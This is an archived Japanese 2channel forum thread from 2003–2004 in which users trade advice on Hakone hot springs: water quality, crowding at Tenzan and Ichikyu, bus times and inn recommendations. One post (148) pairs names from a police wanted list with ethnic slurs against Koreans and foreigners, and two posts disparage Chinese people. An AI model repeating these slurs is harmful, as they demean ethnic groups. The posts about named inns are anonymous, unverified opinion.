 天山、IWGP奪取おめw

117 :114:03/11/19 12:32 ID:RDl+t21p
>>115
平日行ったんだけど結構人多かったです。
週末は凄く多いと思います(´・ω・`)
>>116
TTD×2→ムーンサルト奪取おめw


118 :名無しさん@いい湯だな:03/11/20 02:34 ID:qzMJ8mxR
>>117
週末の夕方はあのへん観光して最後に寄ってく客が多くて混むんよねー。
日曜の22時とか行くとガラガラでいいぞー。

119 :名無しさん@いい湯だな:03/11/27 19:09 ID:qobCd2Q1
紅葉ですねー

120 :名無しさん@いい湯だな:03/12/03 14:14 ID:N7S01DWQ
小湧谷の某温泉設備に、「オタクの温泉はどう?」と
メールで質問したら「単純温泉の循環湯」という返事が来た

121 :名無しさん@いい湯だな:03/12/04 01:09 ID:vu4+XDfv
強羅や仙石原で、硫黄泉でかけ流し、非循環のところってないのかな(日帰り入浴できるとこで)
大半が某会社から買ってるから難しいとおもうが、
たとえば俵千閣なんかは、ザバザバ流れ出てた記憶があったが、実際のところ?。

122 :名無しさん@いい湯だな:03/12/04 01:32 ID:UVV2FbTE
強羅は必死でネット検索すれ、1ヶ所条件通りの温泉があるから。
あんま公表されてないんで(5月の自遊人に載ったけど)
ここでも詳細は書かないが通常の観光施設ではない。

123 :名無しさん@いい湯だな:03/12/04 02:28 ID:zuNbJP7K
>>121
向山という宿がランチ付きで入浴させてくれるよ。
一滴も加水してないし、白い濁り湯で気持ちいいっス。

124 :名無しさん@いい湯だな:03/12/04 09:36 ID:nGZlfUii
俵石閣
ウェルテル俵石
向山(既出)
ケーブルカー早雲山駅前の早雲閣の裏のお寺のもらい湯(白濁だったかなぁ)
白濁の硫黄泉だと知っているだけでこれ位。

125 :名無しさん@いい湯だな:03/12/04 13:53 ID:pQ7g+4PP
萬岳楼もそうなんじゃない?
食事付き日帰りは異常に高いけど。

126 :名無しさん@いい湯だな:03/12/04 20:06 ID:nGZlfUii
>>125
あ・・・もちろんそうです。しかも一番濃い。
でも余りの高さに脳内から除外してました(w

127 :名無しさん@いい湯だな:03/12/04 23:07 ID:norwb6Lh

http://www.atami-amic.com/onsen/


128 :名無しさん@いい湯だな:03/12/06 00:49 ID:wX+Yh/t5
西武と小田急が連携へ
箱根観光テコ入れ
 西武グループと小田急グループが、神奈川県・箱根の観光で連携する方針を固めたことが、5日明らかになった。堤義明西武鉄道会長と利光国夫小田急電鉄会長らグループトップが10日に記者会見して発表する。

 両グループは、1950年代に箱根の観光開発で激しく対立し「箱根山戦争」と呼ばれ話題になった。現在でも箱根地区で両グループの連携はほとんどないが、観光客数が低迷する中、過去の争いを超えて観光面のテコ入れを図ることにした。

 具体的には、小田急が東京都心から運行する高速バスを延長し、ホテルやゴルフ場などを備えた西武のレジャー施設「箱根園」と結んで、集客面で協力することが柱。



129 :名無しさん@いい湯だな:03/12/08 00:09 ID:YSd48Vn3
今日、箱根行ってきました。
温泉は芦之湯の旅館「きのくにや」の日帰りと帰る前にどこでも話題の「天山」
2つとも初めて行ったのだが「天山」にはまた行きたいと思う
狭い旧道から突如巨大駐車場が出現、夜行ったのにほぼ満車。
後はシャンプーを備え付けてくれるとなおいいかも
「きのくにや」はお湯循環?設備自体悪くなかったが

130 : ◆iBy3gpatgg :03/12/08 00:47 ID:ZIdYE0Ww
きのくにやが循環かどうかはわかりませんが、
天山の土日は人大杉の関係で循環(半循環)してますよ。
次行かれるときは、掛け流しをしている平日がお勧めです。

131 :名無しさん@いい湯だな:03/12/08 00:54 ID:i+g9BpeZ
芦ノ湯、底倉、姥子だな

132 :名無しさん@いい湯だな:03/12/08 02:31 ID:yq55BKYs
2004年カレンダー、注文受付中。
http://www.tcn-catv.ne.jp/~diet/calendar.html

133 :名無しさん@いい湯だな:03/12/10 00:27 ID:vjUgltcm
早雲山のお寺の温泉に行ってきました。最高でした。
泉質、眺めともに◎。

134 :名無しさん@いい湯だな:03/12/11 02:12 ID:gwviMVAf
>133

意外と穴場かもしれませんね。
早雲山のお寺の温泉。
私も行った事ありますが、結構、よいですよね。

135 :名無しさん@いい湯だな:03/12/11 19:34 ID:RS840G+K
こうやってネットに出て、人が行くようになる・・・
残念だが、次を探そう

136 :名無しさん@いい湯だな:03/12/11 19:58 ID:pxKzY0EY
天山の前に位置する こうぼうの湯はどうよ
温泉の効能は弘法の湯のほうがあるかと…

137 :名無しさん@いい湯だな:03/12/11 21:08 ID:Akf+kWCQ
頓狂楼 早雲閣のお湯は最乗寺箱根別院と同じなんですかね?
郡司さんもそれらしいこと言ってたけど。

138 :名無しさん@いい湯だな:03/12/12 12:26 ID:ubCqAOCs
>>137
引き湯で確か同じ湯と違う泉質と2種あったような覚えがありますが。
だいぶ前なので、うろ覚えですが。

139 :名無しさん@いい湯だな:03/12/13 04:48 ID:XDd/10En
>136
なんか銭湯みたいなとこですあすこは。

140 :名無しさん@いい湯だな:03/12/22 19:36 ID:8kmkarfC
去年の12月30日にロマンスカーで天山に行った。
聞くまでも無かったのだが、タクシーウテシに「今日は混んでますかねぇ?」と聞くと、
「どうでしょうね、みなさん1年のアカを落としに来られるでしょうから・・・」
・・・まさにその通り、芋洗い状態の浴場だった。
そのときは「こんな目にあってまで!」と思った。

だが、帰ってきて不思議と気になるのが『天山』であった。
食事どころも床暖房(温泉が通してあるのか?)で良いのであった。
今度は平日に行ってみたいな。
(帰りは箱根湯本まで無料送迎ハズに乗りますた)

141 :名無しさん@いい湯だな:03/12/23 09:49 ID:XroiGmBy
天山は新年1月15日より1200円に値上げになるみたい。
その代わりにロッカーが100円返却式になるそう。
ちなみに一休はかわらないそうです。

142 :名無しさん@いい湯だな:03/12/26 23:15 ID:RDQo4gWy
できれば箱根、もしくは神奈川県内なら
どこでもいいのですが、

@日帰りでお湯につかれる
A料理がおいしい
Bお湯の質がいい
C貸切風呂がある

という条件のホテルや旅館をご存知でしょうか。
優先条件は@、A、B、Cの順です。
BとCは厳しそうなので、満たさなくても
かまいません。

143 :名無しさん@いい湯だな:03/12/26 23:20 ID:RDQo4gWy
今調べたら、国内旅行の方が人が
多そうですね。あちらに行ってきますので、
無視して構いません。失礼いたしました。

144 :名無しさん@いい湯だな:03/12/29 22:09 ID:BWGbxQ0W
Aもなかなか厳しいと、、、
どうせなら伊豆あたりの方がまともなんじゃないですか

145 :名無しさん@いい湯だな:03/12/30 00:00 ID:LJRJGegy
天山は昨日の日曜に行ったが人が多すぎて
落ち着かなかった。よって二度と行かない。
今度行くなら弥坂共同浴場ですね。

146 :名無しさん@いい湯だな:03/12/30 06:28 ID:slfPjn/D
そっちの方がよっぽど狭くて地元民でゴミゴミしてると思うが。

天山行くなら22時の受け付け終了ギリギリとか行ってみ。

147 :名無しさん@いい湯だな:03/12/30 08:26 ID:KI1xIXtn
俺も天山は混んでる休日は行かないなあ。
行きたいときは定時後出て19:00過ぎから23:00位までいる。
空いてて快適よん

148 :名無しさん@いい湯だな:04/01/01 02:53 ID:KnQYosW1
とおやま ゆうじ
遠山 勇二

わだ ひろゆき
和田 浩幸

平成15年12月20日
逮捕いたしました。
皆様のご協力
ありがとうございました。 あずま やすひろ
東 康弘

こいつら韓チョソじゃん!
十二人全員三国人じゃん!!

さすが神奈川。凄い事になってますな。http://www.police.pref.kanagawa.jp/wanted.htm

149 :名無しさん@いい湯だな:04/01/04 20:27 ID:fnyErOVy
明日箱根行の温泉くんだけど

観光するところってあるの?


150 :名無しさん@いい湯だな:04/01/04 22:35 ID:pAmiPVDe
ない

151 :名無しさん@いい湯だな:04/01/04 23:32 ID:Bwr0tUQm
>>149

>明日箱根行の温泉汲んだけど

手弁当・・・ならぬ手温泉?


152 :名無しさん@いい湯だな:04/01/07 13:56 ID:I5BeQI3i
天山、天山言うけど一休のほうが断然落ち着く。
駐車場満車で入湯制限あっても一休にいけば5人もいないけどw

153 :名無しさん@いい湯だな:04/01/07 22:57 ID:iYuzO6Xh
>>152
そうなん?

154 :名無しさん@いい湯だな:04/01/08 04:15 ID:DMNNvZCv
>>153
風呂だけやからね。 休憩や食事の施設はない。
早川に面した落ち着いたところで、ゴチャゴチャした天山の露天に比べると趣のある風呂だと思う。

平日は+\200で天山とハシゴできるから、別料金の土日は逆に混まないかも。

155 :箱根、一休♪:04/01/08 13:12 ID:T/NettVr
>>1552>>154 ←<一休のほうが断然落ち着く>
言えてるが あの総檜の湯船の造り’失敗だな 古代檜が泣いてるw
女湯のほうは とびっきりなんだが・・・
それに併設の露天 チャチいが ど〜にかなんもんかな?

156 :名無しさん@いい湯だな:04/01/08 14:28 ID:cYr8XZEE
http://rose.zero.ad.jp/~zbm41595/

http://www.ichigobbs.net/cgi/readres.cgi?bo=sonin&vi=0069

http://www.ichigobbs.net/cgi/readres.cgi?bo=sonin&vi=0063


157 :名無しさん@いい湯だな:04/01/09 02:10 ID:MW5QYJ9a
強羅温泉郷のえっちなポスター、まだ強羅駅前のタクシー乗り場に貼ってあるのかな?

158 :名無しさん@いい湯だな:04/01/10 17:06 ID:A4Kv03bl
箱根に混浴露天風呂でいいところある?

159 :iimono:04/01/10 17:14 ID:KyGt1VVx

画像安定を目的として一般量販店でも売られている、
デジタルノイズキャンセラー(正規品)です。↓
http://www5f.biglobe.ne.jp/~iimono/

9100円即決で、即日発送可能です。

ヤフーオークションでも大人気!!!↓
http://user.auctions.yahoo.co.jp/jp/user/otoku_iimono

160 :名無しさん@いい湯だな:04/01/30 01:12 ID:GEA3d/YN
ソロソロ コノスレ モドサネーカ

161 :名無しさん@いい湯だな:04/01/31 09:24 ID:PnmBiFBC
リ・カーブ箱根に泊まったことある方いませんかー?どんな感じだったか教えてください。来週箱根に行く予定なのでどこかお勧めの宿などある方もお願いします☆

162 :名無しさん@いい湯だな:04/02/10 01:43 ID:LdeoOwgR
>>155
男湯、女湯の両方を知っているのは、
犯罪者か関係者。

163 :名無しさん@いい湯だな:04/02/10 01:53 ID:ZgP2ujX6
天山は、平日は掛け流しって聞いたんですけど、
一休はどうなんですか?

164 :名無しさん@いい湯だな:04/02/10 13:23 ID:edL77vTB
天山、昔は循環してたんだけど保健所のご指導とやらで掛け流しになったと
掲示がしばらく出てたな。そん時に湯滝ん処が温泉灸に変わった。
休日だけ循環に戻してるって事はないんじゃない?

165 :名無しさん@いい湯だな:04/02/10 13:37 ID:7QIfkC+R
>>162 ゲストでしw

166 :名無しさん@いい湯だな:04/02/11 07:48 ID:nmKt6af2
駅前にエロ温泉があるそうなんですが、知ってる人いますか?

167 :名無しさん@いい湯だな:04/02/11 10:33 ID:DwMP+u2a
天山は休日はあまりに人が多いんで衛生上循環にしてるそうです。
平日は掛け流し。天山内で売ってる宣伝用新聞にも書いてあるよん

168 :白い湯のファン♪:04/02/13 10:36 ID:N5v1//6B
箱根で白濁のいちばん濃い湯は、どこなんだ?

169 :名無しさん@いい湯だな:04/02/13 18:54 ID:bh6iCyeF
>>168
大涌谷の黒卵の湯だろ(w

萬岳楼と言われている。

170 :白い湯のファン♪:04/02/13 21:47 ID:N5v1//6B
>>169
レス、さんきゅっ !! サイトでみたがホントに白いな、今度行ってみるわ。
湯量はど〜なんだろ?
http://www.kashikiri-onsen.com/kantou/kanagawa/hakone/sengokuhara/bangakurou.html

171 :名無しさん@いい湯だな:04/02/14 09:29 ID:2+Z+d5L6
会社の保養所を温泉宿にした5千円ぐらいで止まれる箱根の激安な宿を
この前テレビで特集してたんだけど、メモするの忘れてしまったので
知ってる方教えてください。

172 :名無しさん@いい湯だな:04/02/14 13:15 ID:Eper/TpM
>>171
「四季倶楽部」か「パイプのけむり」だろ。検索してみな。
ちなみに四季の旬香はやめた方が良いよ。フォレストの方が良いよ。

>>170
湯量はそれほどでもないけど「掛け流し」は保証します。6L/分だったかな。

173 :白い湯のファン♪ :04/02/14 15:10 ID:g7W2aWvD
>>172 レス、どもぉ〜〜〜〜〜〜〜っ !!

174 :171:04/02/14 18:20 ID:2+Z+d5L6
>>172
ありがとうございます!

175 :名無しさん@いい湯だな:04/02/16 01:49 ID:b/zqdy43
俺用メモ:天山無料送迎バス・湯本大橋発時刻表(金曜運休、第2第4木曜運休)
10:00
11:00 30
12:00 30
13:--
14:00 30
15:00 30
16:00(終バス)
#天山→湯本大橋バスは10:45から30分おきに15:45まで、ただし12:45と13:15は休み

176 :(*бvб):04/02/16 09:40 ID:nCCbdpQJ
箱根で白濁湯、それも仙石原って事は、造成泉かな?
例の噴気孔の蒸気に水を混ぜて造るという。


177 :名無しさん@いい湯だな:04/02/16 15:46 ID:jHOs0hik
ほぇ?

178 :(*бvб):04/02/16 16:37 ID:nCCbdpQJ
176は萬岳楼の話ね。

人工的に蒸気に水を当てて温泉を造った場合も、通常の硫黄泉(酸性泉)と
同様に、わざと多量の空気に当てて劣化させた方が白くなるのだろうか。
そして掃除もしないで劣化させた方が真っ白で逆に観光客は喜んだりしてね。

草津の白旗の湯は浴槽が二つあって一日おきに交互にお湯を交換してるけど、
観光客は前日にお湯を入れ替えて掃除した白濁している方に入ろうとするのに
対して、地元っぽい人やマニアは白濁していない方(お湯が新しい)を狙うのを
思い出して、ふとそんな事を感じてしまった。(●´ー`●)

179 :名無しさん@いい湯だな:04/02/16 16:38 ID:2oL+yqzZ
箱根の白濁湯は全部造成泉水じゃないの?

180 :(*бvб):04/02/16 17:40 ID:nCCbdpQJ
芦の湯とかは造成ではないかと。
逝った時、白濁とエメラルドグリーンの中間みたいな微妙な色をしてた。

181 :名無しさん@いい湯だな:04/02/16 18:02 ID:jHOs0hik
だれか、おれを騙してんのかぁ?

182 :b.t:04/02/16 20:06 ID:/bKiuG8F
小涌園のみある

東堂文泉 04/02/16 19:04 ID:/bKiuG8F
みかん、夏みかんなどを特許製造法により
液体および粉末加工した製品を製造した浴用剤

参考
http://ip.tosp.co.jp/i.asp?i=patxfuji


183 :名無しさん@いい湯だな:04/02/16 21:11 ID:C+pkOmg7
自然湧出だって人造温泉だって、地中で出来るか、タンクの中かの違いなんで漏れは別に気にしないけどね。
ただ、長距離パイプ輸送で気の抜けた劣化湯は頂けませんがね。
ちなみに仙石原でも元湯・仙郷楼、下湯・冠峰楼などは自然湧出みたい。
芦の湯も自然湧出みたいですね。

184 :名無しさん@いい湯だな:04/02/16 21:24 ID:C+pkOmg7
ごめん、冠峰楼は上湯だったか。詳しくはここ
http://www.asahi-net.or.jp/~ue3t-cb/bbs/special/sience_of_hotspring/sience_of_hotspring_7-1-3.htm


185 :名無しさん@いい湯だな:04/02/20 00:39 ID:o8nHf127
塔ノ沢に一泊してきました。
単純泉 アルカリだが、よくあたたまる。微量成分がいいのかな?

平日だからなのか しずかでした…
宿選びは 失敗しました!(爆

186 :名無しさん@いい湯だな:04/02/20 13:23 ID:V3X1XCLk
>単純泉 アルカリだが、よくあたたまる
うんうん

187 :名無しさん@いい湯だな:04/02/22 20:16 ID:QqckeyZb
彼女と一緒に仙石原にある冨士荘という貸切温泉を訪れたのですが、
門をくぐった瞬間からおかみらしき人の対応が最悪でした。
遠いところから訪れたというのに、客を出迎えるという態度ではなく、
すぐに料金をせびるような物言い、質問にも丁寧に答えてもらえず、
さっさと風呂場まで連れて行かれたという感じでした。
しかも旅館の従業員と無駄話をしながらの応対という有様。
温泉自体はそれなりによかったのですが、
掃除機の音が聞こえっぱなしで情緒も何もあったもんじゃなく、
温泉を出たら廊下に掃除機が転がりっぱなし、
宿を出ようとしたときもおかみは玄関前の椅子に足を組みながら座り、
関係者としゃべりながらこちらを横目で見送るという態度で、
本当に嫌な気分でした。


188 :名無しさん@いい湯だな:04/02/23 14:43 ID:lo+Wf76Z
>>187
私も泊まったことあります。
そういうネタはこちらにしましょう。

二度と泊まりたくない宿
http://travel.2ch.net/test/read.cgi/travel/1058743142/


189 :名無しさん@いい湯だな:04/02/24 00:15 ID:pkTF7fjb
>>187

冨士荘俺も行ったことあるよ。
確かにおかみの感じはあまり良くなかったね。
携帯を部屋に忘れてきてしまったんだが、
後で連絡したら、そんなもんねえって言われたし。

まぁ、他でなくした可能性も否定できないから、
そう強くは言えないが・・・

でも、風呂はすごく良かった。
あそこ連れて行けばどんな女でも満足するだろ。

190 :名無しさん@いい湯だな:04/02/25 11:06 ID:v92qIXFe
どんな女でも満足すると思ってるのはあなただけ>>189

191 :(*бvб):04/02/25 13:02 ID:6/abXMe+
>>190
えっちみたいなものですね<どんな女でも満足

192 :nanashi:04/02/26 00:55 ID:hgnRjSdV
カップルでしっぽりするなら箱根だとどこの宿がいいでしょう?

193 :(*бvб):04/02/26 13:07 ID:n3L1xRL+
とりあえず、富士屋ホテルとでも書いてみる。

胃を鍛えて強くするのには、きのくにやかな。

194 :名無しさん@いい湯だな:04/02/26 13:15 ID:bC910DRD
対星館。隠れ家っぽいぞー

195 :nanashi:04/02/26 23:52 ID:hgnRjSdV
対星館てヒュードロドロが出る宿じゃありませんでした?

196 :名無しさん@いい湯だな:04/02/27 14:33 ID:iNEjRLSP
げっマジですか!?>>195詳細キボン

197 :名無しさん@いい湯だな:04/02/27 16:06 ID:02hRk4dU
対星館がバラケッタなんて聞いた事無いぞ。
それに確かに隠れ家っぽいけど古くて
若いカポーがセクースするにはどうかな。
ドゥーミービラ箱根が適度な隠れ家で推薦。

198 :風呂小路あたまろ ◆Hhx90zUBjo :04/02/29 01:15 ID:ijVEgfjB

   日
   || ∧_∧  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   ノ ヽ(〃・∀・)<松坂屋本店がええよ
.._ || ||( つ□⊂) \________
..\ || || ̄ ̄ ̄ ̄ ̄\
 ||\~~ (<二:彡)  .\




199 :名無しさん@いい湯だな:04/02/29 14:30 ID:3mtOTxf+
>>198
同意。
泉質なら芦の湯松坂屋が良いと思います。
でも露天もサウナも休み処もないので、そういうの求めている方には不満かも。
姥子もいいけど、入浴2000円は高い・・

200 ::04/02/29 16:01 ID:sO3SZen1
カポーで行くなら、部屋の照明は蛍光灯でなく白熱灯の宿が絶対。
顔がきれいに見えるからね。

201 :(*бvб):04/03/01 10:08 ID:mOvHSuB9
>>198
あそこのお湯は箱根No1だと思うけど、日帰り客には冷淡なのがちょっと。
宿泊客で混んでいたらダメだし、当日電話で聞いてみても逝くまで入浴できるかわかんないのがつらい。
だから、ここは平日のみ逝く様にしてる。

202 :名無しさん@いい湯だな:04/03/04 20:17 ID:nE8pecKp
今度箱根で高校生8人で1泊しようと思うのですが、どこか安い旅館ありますか?

203 :名無しさん@いい湯だな:04/03/04 20:58 ID:Jzb5IIoz
>>202
一の湯系
http://www.ichinoyu.co.jp/
パンシオン
http://www.pensionhakone.com/

旅館じゃないが、小田原万葉の湯
http://www.manyo.co.jp/odawara/

204 :名無しさん@いい湯だな:04/03/05 01:17 ID:S5FT1Ea6
パイプのけむりでしょ。

205 :名無しさん@いい湯だな:04/03/05 15:53 ID:eTZx0Git
桐谷荘の温泉は素晴らしいと思う。
場所も隠れ家的でヨイ。

206 :名無しさん@いい湯だな:04/03/05 16:58 ID:H/4nScz+
>>205
そこあたってみたんですが、足元見られました(汗

207 :205:04/03/08 15:35 ID:Cbdw5kZu
>>206
ロケーションがいいので強気なんでしょうな。
でも平日2食付きで¥10,000なので、
そんな驚くほど高くはないと思いますが…。

208 :名無しさん@いい湯だな:04/03/08 17:22 ID:ewQRtAwt
>>207
HPだと学割利くみたいなのに、平日にもかかわらず電話かけたら12000円だそうです。(春休み割り増し以前の日

209 :名無しさん@いい湯だな:04/03/12 18:53 ID:uy8Iw5hb
彼氏と二泊で旅行に行ってきました☆
一泊目は「小さな温泉宿たきい」←こじんまりしていて凄く
落ち着いた。旦那さんもいい人だし、奥さんもゴハン部屋出しの時色々と話してくれて
良かった。時間外だったのに外の温泉に入れてくれた。感謝。
リピーターになりたいつてくらい良かった。テレビがお金かかったからビックリしたけど。

二泊目は「ビラ箱根」←とにかく安かった。7千円ですごく広い部屋。
温泉も二十四時間入り放題☆従業員が多少怖いおばちゃんがいたりして
驚いたけれど、いい宿だった。携帯が圏外になるけど良かった。

3日間とも凄く良かったです。絶対また行きたいです!!

210 :名無しさん@いい湯だな:04/03/12 21:30 ID:RsKaLcIG
安い旅館はテレビは有料が多いね。

211 :名無しさん@いい湯だな:04/03/12 23:53 ID:nZUYjUa2

テレビ有料・・・いまどき何考えてんだろw

212 :名無しさん@いい湯だな:04/03/13 03:53 ID:SoNeiCN4
箱根ビラ(「ビラ箱根」とは違うらしい…)という貸し別荘に泊まろうと思ってるのでつが、
施設の割りに安すぎてなんか裏があるんじゃないかとか、妙に疑ってしまいまつ(;´Д`)
内風呂も露天風呂もついてるのに(しかも温泉)、物凄く安いような…。
どんな情報でも良いので、何か知ってる方がいましたら教えて下さい!
ちなみに箱根ビラのHPはこちらっす。↓
ttp://www.o-stet.com/page022.html


213 :名無しさん@いい湯だな:04/03/13 16:40 ID:OobXuHBf
>>212
オカ板で聞くと真相が分かります・・・

214 :名無しさん@いい湯だな:04/03/14 00:42 ID:YtFd2mZW
>>213
真相って?

215 :名無しさん@いい湯だな:04/03/15 15:33 ID:SCnJb5yo
出るのですか・・・。

216 :風呂小路あたまろ ◆Hhx90zUBjo :04/03/16 14:03 ID:CeiEcatM
   日
   || ∧_∧  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
   ノ ヽ(〃・∀・)<おめえ おり 週末の天気ヨカタラ、ツーリングがてら
.._ || ||( つ□⊂) \ 早雲山温泉へぇってくるわ
..\ || || ̄ ̄ ̄ ̄ ̄\\________________
 ||\~~ (<二:彡)  .\


217 :(*бvб):04/03/17 14:34 ID:42MMAziO
そういえば、きのくにやって食中毒出してるのにあまり話題にならないし、
循環でも不思議と叩かれないよね。
ぐぐっても食中毒の件はあまりひっかからないし、
当然宿のホームページには何も書いてない。

参考(第10回箱根ヨコワケハンサムワールド中止のお知らせ)
ttp://www.djr69.com/djr/yohawa10.html

218 :名無しさん@いい湯だな:04/03/17 16:04 ID:oDkhKdhs
来月に温泉旅館みたけに泊まりたいなと思っているのですが
食事の情報がどこにも出ていないのでご存知の方教えていただけませんか?

219 : ◆DDDDQN/77. :04/03/21 02:32 ID:F32aLHxG
湯船で富士山見ながらとなると何処ですか?
日帰りなので部屋から見えるんじゃ意味が無いわけで。
当方横浜。
もっと足伸ばせばいくらでも見れるだろってのはナシの方向でおながいします。

220 :名無しさん@いい湯だな:04/03/21 09:04 ID:2yWKegfF
>>219
日帰りで富士山と芦ノ湖だと・・
かんぽの宿はこね(姥子)
ホテルグリーンプラザ(姥子)

富士山だけなら・・・
御殿場温泉会館が超絶景です。
(御殿場ICから箱根方面へ10分位)


221 :名無しさん@いい湯だな:04/03/21 15:53 ID:3qbsl8sQ
>>219
御殿場温泉会館は夕焼けの富士山が絶景だよ。
でも、横浜からなら、東名御殿場から箱根方面じゃなく
山中湖方面に行けば、風呂から富士山見えるところはもっとあるだろうに。
富士山も箱根から見るより、ど〜んと大きいし。
もしかして、車じゃないのか?だったら、御殿場温泉会館は遠いな。
やっぱグリーンプラザかな。

222 :名無しさん@いい湯だな:04/03/22 01:20 ID:/5Yg6LTe
箱根あたりで、桜を見ながら入れる温泉ってないかなぁ。

223 :名無しさん@いい湯だな:04/03/22 01:59 ID:iEdxxklR
ないよ

224 :名無しさん@いい湯だな:04/03/22 02:46 ID:EcKZkodV
>>222
今売ってる旅行読売に花見の出来る露天風呂とかの記事があって、
ペンション箱根の山ってのが載って気がするが。
(立ち読みだったので、温泉だったかはうろ覚え)

225 :名無しさん@いい湯だな:04/03/22 11:13 ID:2+s37I0A
>>222
宮城野温泉会館
期待するほどでも無いけどね。

226 :名無しさん@いい湯だな:04/03/22 18:51 ID:iEdxxklR
うん、なんか汚い印象が記憶に。

227 :名無しさん@いい湯だな:04/03/22 19:17 ID:/9tmRR7S
「料理」が美味しくて25000円以内で泊まれるお勧め旅館おしえていただけませんか。
豊月や桜庵、花ゆらが素敵と思いましたが、高い・・・・・

この間別所温泉行ったんですが、食事がキノコと山菜ばっかりで、大食漢の夫は
不満でブーブーでした。
「絶対こんどは料理が美味しいところじゃなくちゃいやだ」と言われ、探すほうも必死です。
詳しいかた、おしえてくださいお願いします。



228 :中居正広:04/03/22 19:20 ID:MTZ3kMrS
南風荘いいよ、最高

229 :名無しさん@いい湯だな:04/03/22 19:29 ID:/9tmRR7S
すみません、さっき書き込んだと思ったら、入ってないからどこかへ誤爆したかもしれません。
もう一度書きます。マルチじゃないので、どこかで同じ書き込み見ても怒らないで下さい。

「料理」が美味しくて25000円以内で泊まれるおすすめの温泉旅館おしえていただけませんか。
豊月や花ゆら、桜庵などが素敵だと思いましたが高い。。。。。

この前、長野の別所温泉に泊まりましたが、食事が山菜やキノコ、川魚ばかりで、
肉大好きで大食漢の夫は不満ブーブーでした。
「今度は絶対に料理の美味しいところに泊まる!」といきまいており、探すほうも必死です。
詳しいかた、どなたかおしえてくださいお願いします。

230 :名無しさん@いい湯だな:04/03/22 20:18 ID:WjBVItgc
面白い奥様ですね。

231 :名無しさん@いい湯だな:04/03/22 21:59 ID:rEW8Q97/
>>229
旅館は適当に夕食抜けるとこ選んどいて、箱根ビール藏にでも出かけた方が満足できんでない?

232 :229:04/03/22 22:14 ID:/9tmRR7S
>>230 いえ、必死です。

>>231 
ご提案ありがとうございます。すみません、ちゃんと書かなかったのですが、温泉宿では
温泉→ゴロゴロ→温泉→お夕食→ゴロゴロ→温泉→寝る のような休息をとりに行く
のが通常で、あまり外出をしません(お寺とかある地域の場合は見物にいきますが)。
というわけで、着替えて外出はきっとしないと思うので、やっぱり宿の料理が美味しいところを
是非おしえていただければありがたいです。    


233 :名無しさん@いい湯だな:04/03/22 22:40 ID:K07VrO7C
>>229
「はつはな」はどう?

234 :名無しさん@いい湯だな:04/03/23 00:20 ID:ZyYvf+Hn
中国人はやることがエゲツナイ

http://www.geocities.co.jp/WallStreet-Stock/4371/liusuan/index.html


235 :229:04/03/23 09:12 ID:o44A92E0
>>233
HPを見てみました。綺麗なところですね!
料理が美味しいのですか?HPではお食事のページが「工事中」で、肝心の料理が見られませんでした(´・ω・`)
でも、お勧めいただいたので候補に入れさせていただきます。ありがとうございました。
料理が美味しいかどうかは写真では判らないので、実際にご存じのかたにお勧めいただけるととてもありがたいです。


236 :名無しさん@いい湯だな:04/03/23 12:49 ID:Uo1hXJOh
天山行ってきました。
いいお湯でしたが、
脱衣所に監視カメラがあるのはなぁ・・・・。
あれって誰が見てるんだろ?

237 :名無しさん@いい湯だな:04/03/23 13:49 ID:WB7MsLup
>>235
はつはな料理はレストランで食べるんだけど、小奇麗ですよ。
女性をターゲットにしてあります。結果量は非常に少ないです。
追加料理(頼んだことないけど)をたくさん注文するといいかも。

238 :名無しさん@いい湯だな:04/03/23 19:49 ID:vcLYInWr
test

239 :229:04/03/24 08:15 ID:OdJRmn7I
>>237
おしえてくださって本当にありがとうございました。
上にも書きましたが、夫は大食漢なので、はつはなの場合は追加料理が必要になりそうですね。

武蔵野別館や豊月については色々書き込みがありますが、
章八、吉池旅館、仙卿楼 のお料理についてご存じのかたいらっしゃったらおしえていただけませんか。

いずれにしても、連休は暦どおりにしか休めないので予約が大変そうです。
いくつか電話しましたが、30日(金曜平日)なら空いてる、とか5月5日(次の日が平日)しか空いてないとか
そんなお返事ばかりでした・゚・(ノД`)・゚・




240 :名無しさん@いい湯だな:04/03/24 15:50 ID:ZBzFAezg
>>229
えっ、GWに行くの?
それなら、どこがいいとかって問題じゃなくて、
大至急空いてる宿をおさえた方が・・・。
JTBとかのHPで簡単検索してみるといいよ。
イイ宿はほとんど残ってない。5月1日泊ならまだ数ありそうだが。
連休中はほとんど満室になるので、大きな宿だと、風呂とかが満員になる。
できれば、小さい宿がいいんだけどね。

241 :229:04/03/24 18:04 ID:OdJRmn7I
>>240
はい。GWに行きます。
はつはな、武蔵野別館、豊月(だめもとで)、大和屋と電話しましたが、
どこも連休中はいっぱいで、30日ならなんとか、っていうかんじでした。

大きい旅館とかホテルならまだ予約とれるかもしれませんね。
お風呂が混みこみになっちゃうんですね・・・・・それは嫌だなぁ・・・・

とにかく、とれるところから責めていくことにします。一応料理重視という視点は変えずに!
頑張ります!みなさま、ありがとうございました!!


242 :名無しさん@いい湯だな:04/03/24 18:48 ID:4PeufhQx
同じホテルでもグルメプランとかにすれば
ボリュームだけはふえていく。

243 :名無しさん@いい湯だな:04/03/24 20:07 ID:+SuhB2f9
中国人はやることがエゲツナイ

http://www.geocities.co.jp/WallStreet-Stock/4371/baoli/index01.html

244 :名無しさん@いい湯だな:04/03/26 02:28 ID:Tmckh0YS
「個室休憩」というのはどういうものなのですか?
カップルでイチャイチャもOKだったり?

245 :マネクス太郎 ◆OzHhpn7Iuc :04/03/26 02:58 ID:3Qa0rMXQ
>>239
吉池旅館: お勧めしません。食事だけでなくサービス面でも今ひとつかと。とにかくエアコンの利きが悪くて辛かったです。
仙郷楼: 悪くないと思います。食事は至って普通。少なくともつみれは美味しかったですよ。あと風呂が充実してます。

246 :名無しさん@いい湯だな:04/03/26 14:44 ID:FGc0YbLp
>>244
「営業妨害 !! 」・・小田原ラブホ組合

247 :244:04/03/26 15:59 ID:Tmckh0YS
>>246
やっぱそっち系OKですか。
実際に利用された方のレポートきぼん。
おすすめ宿なども。

248 :(*бvб):04/03/26 18:31 ID:ygKGrz9L
吉池って掛け流しらしいけど、日帰りは不可なん?
HP見ても記載されていないし。

249 :239:04/03/26 21:11 ID:w9vSl+gN
>>245
おしえてくださってありがとうございました。
吉池、やめておきます・・・・



250 :名無しさん@いい湯だな:04/04/02 12:41 ID:Y/dvbMRw
姥子の醜名館だけは行くな。
部屋のテーブルにはうっすら埃が積もり、
畳は擦り切れ、髪の毛やら綿埃が転がり、
床の間には退色した造花が無造作にいけてある。

名物女将と呼ばれるオバハンの態度は横柄で
勘違い発言多発。
